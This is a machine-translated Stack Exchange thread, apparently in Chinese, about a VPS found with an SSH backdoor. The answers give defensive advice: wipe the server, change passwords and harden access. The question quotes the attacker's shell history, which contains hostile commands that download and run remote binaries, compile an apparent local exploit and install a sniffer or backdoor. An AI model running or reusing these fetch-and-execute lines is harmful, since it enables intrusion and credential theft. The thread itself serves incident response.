在VServer上找到SSH后门。该怎么办?


24

昨天,我检查了VServer上的命令历史记录。我发现了几条可疑的线。

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

尤其是sniffer.tgz震惊了我。我设置了虚拟机并下载了此tgz存档。我开始设置,它给了我以下几行:

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

有人知道如何删除吗?


Answers:


66

这是您在拥有此系统的所有系统上应该执行的操作sniffer.tgz立即从Orbit中将它们删除,然后从全新安装开始。(也就是说,销毁系统,重新安装干净的系统,从干净的备份中加载数据-假设您的备份是干净的,然后在将系统放回Internet之前对其进行加固)。

每当您有这样的恶意软件或黑客进入您的系统时,就该重新分析系统的配置,并确保不要重复与之相同的步骤。但是,由于这可能不是一个系统,因此您可以搁置并进行取证分析,并且由于这可能是您唯一的服务器,因此该破坏虚拟系统并从头开始的时候到了(如上所述)。

(这适用于您在系统上感染恶意软件的任何情况。除非您有备用硬件来替换类似的东西,这样您就可以隔离并取证检查被破坏的系统(通常大多数用户没有),您别无选择,核对系统并重新开始。)

如果不分析您的服务器,我无法真正说出您做错了什么,但是很可能这个后门比只安装一个简单的“程序”在系统中更深入。而且,由于恶意分子已经必须在系统上安装后门,因此您可以假定您的所有密码现在都已被破坏并且不再安全(无论是SSH,MySQL root还是任何其他具有EVER的密码类型)已输入此计算机系统)。是时候更改所有密码了!


在干净的环境中备份后,这里有一些有关加强步骤的基本提示。请注意,由于这些使它成为更广泛的主题,因此我在这里无法真正进行详细介绍,但是绝对是时候采取一些强化措施来保护您的系统了:

  1. 打开防火墙仅允许访问需要打开的端口ufw存在很简单,所以让我们使用它。 sudo ufw enable。(ufw为您的环境正确配置是另一回事,这超出了此问题的范围。)

  2. 限制对远程SSH的访问。这并不总是可行的,但是理想情况下,您将识别出您拥有的IP地址,并在防火墙中将其列入白名单。(如果您使用的是动态住宅IP地址,请跳过此步骤)。

  3. 锁定对服务器的SSH访问,并且仅要求使用SSH密钥进行身份验证。这样,黑客就无法攻击您的服务器并尝试猜测密码。猜测正确的私钥要困难得多(因为您必须对所有私钥进行暴力破解),这有助于防止暴力破解攻击。

  4. 如果您正在运行一个网站,请确保锁定权限,以使人们无法随意上载/执行操作。这样做因站点而异,所以在这里我不能为您提供更多指导(这是不可能的)。

  5. 另外,如果您使用Joomla或Wordpress或类似工具来运行网站,请确保您保持环境最新,并使用软件提供商的安全漏洞进行修补

  6. 在可能的情况下,设置,配置和使用两因素身份验证(2FA)方法来进行身份验证。对于不同的应用程序,有许多用于二次身份验证的解决方案,并且以这种方式保护各种应用程序超出了本文的范围,因此,在选择解决方案之前,您应该对此进行研究。

  7. 如果您绝对必须在设置中使用密码,请使用体面的密码管理器(基于云的密码管理器不一定是不错的选择),并使用长度(25个以上的字符),随机且难记的密码,每个密码都不同由密码保护(因此建议使用密码管理器)。(但是,您应该强烈考虑不要在可能的情况下使用密码(例如用于SSH身份验证),并在可能的情况下使用2FA)。


评论不作进一步讨论;此对话已转移至聊天
terdon

我接受了答案,因为这就是我要做的。没关系,我只是出于个人利益,尝试关闭VM的后门程序。
itskajo

0

如果有一个后门,则还有3个。隔离,备份数据,核对数据并仔细还原数据。请注意任何cron,php甚至mysql数据,它们都可能受到损害。请记住,此时它们已经拥有了您的所有密码和哈希,因此,如果您对其他机器进行类似配置,它们也可能也会入侵这些密码。如果您有WordPress在插件/主题等中查找恶意软件...请检查您的权限,到处可能有777。没有简单的答案,您正在做很多工作。


不一定要多于一个,但是在这里可能并非经常如此。而且他们可能并没有确定所有密码。他们也没有“可能”入侵了其他计算机,您不知道他们的意图,也没有嗅到什么,或者恶意程序甚至以某种形式存在或运行之外是否被激活。对于需要非常细致的操作,“仔细还原数据”是非常通用的建议。
詹姆斯
By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.